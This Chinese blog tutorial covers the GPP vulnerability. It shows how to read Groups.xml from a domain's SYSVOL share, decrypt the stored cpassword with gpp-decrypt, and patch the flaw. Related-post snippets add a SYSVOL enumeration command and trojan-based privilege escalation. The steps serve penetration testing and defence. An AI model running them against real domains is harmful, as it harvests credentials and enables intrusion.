gpp组策略信息收集

于 2022-04-08 15:45:36 发布
阅读量3.1k 收藏
点赞数
分类专栏: 渗透测试 文章标签: 安全 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w1590191166/article/details/124043134
版权

一、 简介

SYSVOL 是活动目录里面的一个用于存储域公共文件服务器副本的共享文件夹,在域中的所有域控制器之间进行复制。SYSVOL 文件夹是在安装活动目录时自动创建的,主要用来存放登录脚本、组策略数据及其他域控制器需要的域信息等。
SYSVOL 在所有经过身份验证的域用户或者域信任用户具有读权限的活动目录的域范围内共享。整个 SYSVOL 目录在所有的域控制器中是自动同步和共享的。

二、组策略创建(DC上)

  1. 管理工具->组策略管理
    在这里插入图片描述
  2. 新建组策略对象
    在这里插入图片描述
  3. 编辑组策略对象,新建用户,输入密码。此时含有加密密码的组策略配置文件已保存至\192.168.x.x\sysvol\hack.com\Policies{0A6A4062-3DAE-4062-A0BD-CC8E69E3CDCC}\Machine\Preferences\Groups\Groups.xml
    在这里插入图片描述
    在这里插入图片描述

三、漏洞利用

  1. 任意域内机器访问:\192.168.x.x\sysvol\hack.com\Policies{0A6A4062-3DAE-4062-A0BD-CC8E69E3CDCC}\Machine\Preferences\Groups\Groups.xml,获取内容如下
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="test2" image="2" changed="2022-04-02 09:17:15" uid="{C6E4F311-F308-4455-92CE-DE5AF2A2D328}"><Properties action="U" newName="" fullName="" description="" cpassword="fvCYIisujMxxxxxxxxxxxxxxxxxRHZ8uw" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" userName="test2"/></User>
</Groups>
  1. 密码解密(mac或linux上跑):https://github.com/t0thkr1s/gpp-decrypt,python3 gpp-decrypt.py -c fvCYIisujMu8OXz3lQzn/OHXEluY6RYgl89kpRHZ8uw
    在这里插入图片描述

四、修复

  1. 安装 KB2962486补丁
  2. 给sysvol文件夹设置权限
ATpiu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GPP(Group Policy Preferences)策略组首选项漏洞
weixin_45682070的博客
06-17 826
概念 组策略是配配置计算机中某一些用户组策略的程序 SYSVOL是AD(活动目录)里面一个存储域公共文件服务器副本的共享文件夹,所有域内主机都能访问,里面保存组策略相关数据,包含登录脚本配置文件等 dir /s /a \\域控IP\SYSVOL\*.xml GPO是组策略对象 Group Policy object Gpmc.msc 漏洞产生的原因 域管理员在使用组策略批量管理域内主机时,如果配置组策略的过程中需要填入密码,那么该密码会被保存到共享文件夹\SYSVOL下 简单的说就是:组策略首选项里输入了
监控组策略应用----组策略结果
weixin_34015860的博客
02-24 148
组策略结果 你使用组策略结果来验证应用到一个计算机和登录到该计算机的用户的组策略设置。虽然这些数据和组策略建模工具产生的数据相似,但从客户计算机的那里的收集到的组策略的最终设置,而不是从域控制器上建模出来的结果集。使用组策略结果得到数据,要求客户计算机必须是Windows XP或Windows Server 2003或Windows 2008。 示例:组策略结果 使用市场部计算机market...
组策略详解
weixin_34115824的博客
02-27 632
组策略详解...事件查看器排除系统故障(共两则)  组策略是管理员为计算机和用户定义的,用来控制应用程序、系统设置和管理模板的一种机制。通俗一点说,是介于控制面板和注册表之间的一种修改系统、设置 程序的工具。微软自Windows NT 4.0开始便采用了组策略这一机制,经过Windows 2000发展到Windows XP已相当完善。利用组策略可以修改Windows的桌面、开...
组策略内容一览
allway2的博客
01-21 700
内容一览 简介xxv 第1章组策略要点1 第2章使用GPMC和通过PowerShell管理组策略67 第3章组策略处理行为要点169 第4章高级组策略处理223 第5章组策略首选项249 第6章使用组策略管理应用程序和设置...
GPP 组策略首选项漏洞
Sunnet的博客
03-24 3590
0x01 前言 GPP漏洞只在2008没打补丁版本上存在,超过2008版本的系统没有办法写入密码。 0x02 组策略首选项 组策略首选项是一组组策略客户端扩展,可向运行 Microsoft Windows 桌面和服务器操作系统的加入域的计算机提供首选项设置。首选项设置是部署到桌面和服务器的管理配置选项。首选项设置与策略设置不同,因为用户可以选择更改管理配置。 0x03 SYSVOL SYSVOL 是活动目录里面的一个用于存储域公共文件服务器副本的共享文件夹,在域中的所有域控制器之间进行复制。SYSVOL
3GPP频段信息
09-22
3GPP频段信息
Windows Server 2008 R2组策略概述
11-28
- **组策略首选项(Group Policy Preferences,GPP)**:添加了对非安全设置的支持,如文件、注册表、驱动器映射等,使得对用户环境的个性化配置更为灵活。 - **组策略远程脚本(Group Policy Scripting)**:利用...
3GPP 5G标准中文版
07-18
《3GPP 5G标准中文版》是深入理解5G技术不可或缺的重要参考资料,它包含了3GPP组织制定的5G通信系统规范的中文翻译。3GPP(3rd Generation Partnership Project)是一个国际性的标准化组织,负责制定全球移动通信...
3GPP协议 38.331
最新发布
01-12
这是3GPP的5G协议 38.331,即RRC协议,pdf版本,可以当做参考资料
matlab_3gpp信道模型
06-19
通过深入理解和使用这些MATLAB代码,研究者和工程师可以评估不同通信技术在各种复杂环境下的性能,进行波形设计、调制编码方案选择、资源分配策略优化等。同时,这些模型还可以用于测试和验证基站和终端设备的硬件及...
组策略本地计算机策略导出,关于win10系统本地组策略备份和设置的详细步骤
weixin_35900054的博客
07-30 2570
系统备份对于win10的系统来说是很重要的,系统出现了一些问题的时候操作备份直接备份实现的,那在win10系统中有用户看到了对于备份和修改本地组策略的时候系统出现了警告的提示,导致我们编辑本地组策略的时候还原系统的操作无法实现了,对于这个打开的疑问今天小编就来跟大家分享一下关于win10系统本地组策略备份和设置的详细步骤。具体的方法和详细的步骤如下;在开始之前,先要提醒大家,请勿将通过运行 gpe...
Windows组策略首选项GPP提权
谢公子的博客
02-17 4775
SYSVOL是活动目录里面的一个用于存储域公共文件服务器副本的共享文件夹,在域中的所有域控制器之间进行复制。SYSVOL文件夹是在安装活动目录时自动创建的,主要用来存放登录脚本、组策略数据及其他域控制器需要的域信息等。SYSVOL在所有经过身份验证的域用户或者域信任用户具有读权限的活动目录的域范围内共享。整个SYSVOL目录在所有的域控制器中是自动同步和共享的,所有的域策略均存放在 C:\Wind...
通过域控组策略自动获取公司内电脑硬件配置详细方案
时节米的博客
08-12 3672
需求 集团公司对各个子公司电脑硬件在采购时未做详细的统计与盘点。每年都花费不少的时间在核对信息上面,造成巨大的人力物力损失。为避免以上问题,配合AD域和自身知识设计出一套可以自动收集电脑配置信息的功能。 技术应用想法 应用VBS或BAT命令收集电脑信息。优点:无费用。本方法可以有效的收集到电脑大部分软硬件信息,主要还是依托微软系统本身对软硬件信息的收集情况来进行。缺点:无法收集全面的硬件信息,如显示器相关的信息无法获取等。 应用第三方的管理软件或Python开发软件收集信息。优点:可以成套系统化的管
De1CTF2020的Web部分题解
蚁景网安学院
05-08 1489
前言题目质量很好,虽然很难但是学到不少东西!0x01 check in打开题目页面如下:题目是一个文件上传挑战,于是先上传一个.php后缀的文件先式式,不出意料失败,那么我们就上传一张....
PostgreSQL 之 统计信息
HighGO
03-27 4554
PG用于收集统计信息的进程stats collector process 源码路径 :"src/backend/postmaster/pgstat.c"统计信息的存放地启动时, 读入已存在的统计文件, 或初始化0. 数据库运行过程中存储在内存和temp文件; 启动时 : shared buffer -&gt; "src/backend/postmaster/pgstat.c" -&gt; ...
gp企业级收集数据脚本
窦永厚
10-18 123
#!/bin/sh set -x psql -h xxxx -p xxxx -d xxxx -U xxxx -t -F ',' -A -c " select orderId,dxmBid,transactionId,unionLoanCode,trustId from ( select eventtype, getvar...
GPP漏洞利用(组策略学习)
来到了学渣的博客
10-22 1459
本地组策略提权 只要把cs的木马放到本地组策略编译器中,只要机器重启就能上线cs,并且是system权限 把木马上传在C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup 直接gpedit.msc打开本地组策略编译器,并把木马添加在启动项中,应用保存。 电脑重启后,木马以system权限上线 获取域组策略的凭据 创建组织单位aufeng123,将需要下发策略的用户移动到此单位。此时对aufeng123组进行组策略下发,该组里的用户都会被执行
Windows之GPP组策略首选项提权
good good study
03-15 3216
Windows 2008 Server引入了一项称为组策略首选项(Group Policy Preferences)的新功能,该功能使管理员可以部署影响域中计算机/用户的特定配置。通过在组策略管理控制台中配置的组策略首选项,管理员可以推出多种策略,例如,批量修改域内机器的本地管理员账号名称与密码 SYSVOL是AD(活动目录)里面一个存储域公共文件服务器副本的共享文件夹,所有的认证用户都可以读取。SYSVOL包括登录脚本,组策略数据,以及其他域控所需要的域数据,这是因为SYSVOL能在所有域控里进行自动同步
导出全部域控组策略为html,active-directory – 如何转储(收集)域中的所有组策略?...
weixin_39693971的博客
06-23 385
这应该让你开始.Foreach($Policy In Get-ChildItem \\$((Get-ADDomain).DNSRoot)\sysvol\$((Get-ADDomain).DNSRoot)\Policies){Get-GPO -Guid $Policy.Name | Select *# Now you have an individual GPO. Do something usef...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值